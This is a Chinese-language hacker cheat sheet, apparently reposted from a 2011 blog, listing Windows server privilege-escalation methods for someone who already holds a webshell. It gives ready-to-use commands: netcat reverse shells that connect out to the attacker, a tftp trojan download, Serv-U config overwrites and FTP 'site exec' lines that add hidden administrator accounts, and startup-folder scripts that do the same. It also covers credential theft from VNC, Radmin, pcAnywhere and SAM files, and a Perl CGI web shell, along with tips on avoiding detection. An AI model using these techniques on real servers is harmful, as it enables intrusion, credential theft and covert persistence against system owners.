需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录
解决终端mstsc /console /v:你的服务器IP:远程端口IIS管理器 快捷:inetmgr.exe=============================================================================================================================1. pcAnywhere提权:Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ pcAnywhere :cif文件 链接不成功可能是端口改了。5632端口 新:有些服务器的cif文件下载的时候受损,可以自己上传个cif文件去。然后再连接
-----------------------------------------------------------------------------------------------------------------------------nc命令:2.nc反弹提权:
服务器执行: nc位置 -l -p 8080 -t -e cmd位置
监听本地入栈信息
NC地址 cmd地址 --------------------------------------------------- -p port 打开本地端口本地执行: telnet + 服务器IP地址 + 446--------------------------------------------------- -t 以telnet形式应答入栈请求传马命令: tftp -i ip地址 get 木马名字.exe -e 程序重定向
额外:传个NC到Webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。2.降低运行权限
现在本地监听一个端口。
nc -vv -l -p 8080
最好是80或8080这样的端口,被防火墙拦截的几率小很多。
在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
============================================================================================================================
3.flashFXP提权:文件地址 C:\Program FlashFXP 下载Sites.dat文件Stats.dat文件quick.dat文件粘贴本机 FlashFXP Sites.dat
============================================================================================================================
4.radmin提权:
1.第一种:前提开启Remote服务。 注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters2.导出:regedit /e 导出路径.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters 下载3.步骤:OllyDBG打开 radmin控制端(客户端) 然后执行 ctrl+f 搜索 JMP EAX 然后按一下F4 再按F8 然后再 右键-查找-所有常量 输入 10325476 (很好记的 反过来就是76543210) 在弹出的窗口中 选择第一行 F2下断 然后F9 运行 这时 用radmin连接 入侵的服务器 弹出输入密码的提示框 随便输入密码 等你输入完 后 OD也就激活了 这时 你要先运行下Ctrl+F9 再往上几行 选中红色的那块 就是刚才下断的地方 再次 按F2 一下 取消断点 然后再按 F8 这时 鼠标往下走 找到 ADD ES,18 这里 按一下F4 这时 你在左下角的 hex 那里 随便找个地方点一下 然后 运行Ctrl+G 在弹出的栏里 输入 [esp] 注意带大括号的 然后 就注意把第一行 复制替换成 刚才我们得到的radmin密码的hash值 后按F9 运行 "Port"=hex:00,00,00,00 是连接服务端时用的端口,这里是默认的4489.
第二种:导出--下载---上传本地---覆盖
=============================================================================================================================
5.SAN提权:地址C:\WINDOWS\repair 比较垃圾的一种提权 C:\WINNT\system32\config\ 下他的SAM 破解之
============================================================================================================================
6.写启动项提权: C:\Documents and Settings\All Users\「开始」菜单\程序\启动 @echo off net user 123 123 /add net localgroup administrators 123 /add 保存bat文件 @echo off net share c$ /del 防护脚本 net share d$ /del net share e$ /del net share ipc$ /del net share admin$ /del 保存vbs文件 set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"Administrators,group") Set od=ob.Create(user",123") od.SetPassword "123" od.SetInfo Set of=GetObject(os&"/123",user) oe.add os&"/123
============================================================================================================================
7.serv-u 有权限改写提权: (要有修改权限,这个提权需要的权限比较大)找到ServUDaemon.ini文件 User数字=123|1|0[USER=123|1]Password=gn3436a2a7150feb9edf0151aec2bcbde2 (密码前俩位要看上面参数,密码是 111111 )HomeDir=c:\ (Windows目录)TimeOut=600Access1=C:\|RWAMLCDP
在第一项最下面写上:ReloadSettings=True(就是不需要重启)修改后cdm ftp 输入:
cd windows (2003)
cd system32
FTP 命令quote site exec net user 123 123 /addquote site exec net localgroup administrators 123 /addquote site exec net user 123 /del
[USER=123|1]Password=gn3436a2a7150feb9edf0151aec2bcbde2 1234567HomeDir=c:\TimeOut=600Maintenance=System Access1=C:\|RWAMELCDPAccess2=d:\|RWAMELCDPAccess3=e:\|RWAMELCDP
============================================================================================================================
8.serv_u ftp本地溢出提权: 上传--cmd运行(或asp。php运行)---在运行口令:盘符+上传名称.exe "net user 123 123 /add" 盘符+上传名称.exe "net localgroup administrators 123 /add" 注意: 管理员改密码需要下载: ServUDaemon.exe 然后本地破解
============================================================================================================================
9.serv-u ftp覆盖提权:将本地配置的ServUDaemon.ini上传并覆盖原始ServUDaemon.ini,(备份原webwell的serv-u,建立后门后要进行还原)。
使用命令cd windows cd system32quote site exec net.exe user 123 123 /add 修改提权:密码是Password=gn3436a2a7150feb9edf0151aec2bcbde2 1234567注:如果没弄明白上面可以用这个: 1.首先下载serv-u本地配置生成一个ServUDaemon.ini(要配置权限要大) 2.然后上传到服务器serv-u里覆盖(上传前先备份网站ServUDaemon.ini文件,等提权后在换回来,防止发现) 3.执行cmd ftp 远程IP 用户名 密码 cd windows cd system32 quote site exec net.exe user 123 123 /add quote site exec net.exe localhost administrators 123 /add
=============================================================================================================================
10.serv-u 端口转发提权: 1在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1 43958(有可能被改) 2 在本机运行 lcx -listen 5000 21 (lcx地址要写对) 3 打开本地的serv u 在IP上填入127.0.0.1
帐号:LocalAdministrator 密码:#l@$ak#.lk;0@P (密码帐号有可能改 自己下文件看密码) 此时的链接过程是本机连接21端口----转发往本机5000端口-----管道连接至远程机5000端口------转发至远程43958端口 连接成功后,在本机登录的serv-u相当于远程的serv-u 可以ftp本机IP 输入上面的帐号 密码 在远程ftp服务器执行命令.
=============================================================================================================================
11.VNC提权:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 读取。破解由10进制破解到16进制 (本机自带科学计算器)VNC占用端口号5900(看一下有没有5900端口)
c:\>vncx4 -W ( 破解工具)
导出cmd命令:c:\Windows\regegit -e 123.reg HKEY_GURRENT_USER\Software\ORL\WinVNC3\(c;\\可能是d。e。f。盘等看系统盘在哪) 破解工具vncx4.exe
=============================================================================================================================
12.HASH破解提权:
(入侵机房)2003系统:先SAMInside看帐户,后lc5破解 2000系统:直接用findpass、mt、aio等cmd下直接破解(对于机房,大量机器控制)
对于2000用户我们可以直接用findpass、mt、aio等工具
对于2003用户我们可以用findpass2003、aio去试下.
=============================================================================================================================
13.perl提升权限: #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $_ = $ENV{QUERY_STRING}; s/ / /ig; s///\//ig; $execthis = $_; syswrite(STDOUT, " \r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17); close(STDERR); close(STDOUT); exit;保存为cmd.pl上传至BIN目录执行,(不能执行的时候保存后缀cgi) c:\prel或D.E.F.或webwell根目录执行的时候后面打个?符号,然后直接执行cmd命令 具有最高管理权限可直接加帐号密码有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中.
=============================================================================================================================
14.MYSQL提权:
查看当前权限:在root连接成功后,不能执行命令的办法
select '123' into outfile 'c:/windows/111.txt'
net user 123 123 /add & net localgroup administrators123 /add
实践证明 合成一句的效果比较好吧,反正个人这么认为
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\1.bat
C:\Documents and Settings\All Users\「开始」菜单\程序\启动
转载于:https://www.cnblogs.com/amwld/archive/2011/09/04/2166629.html
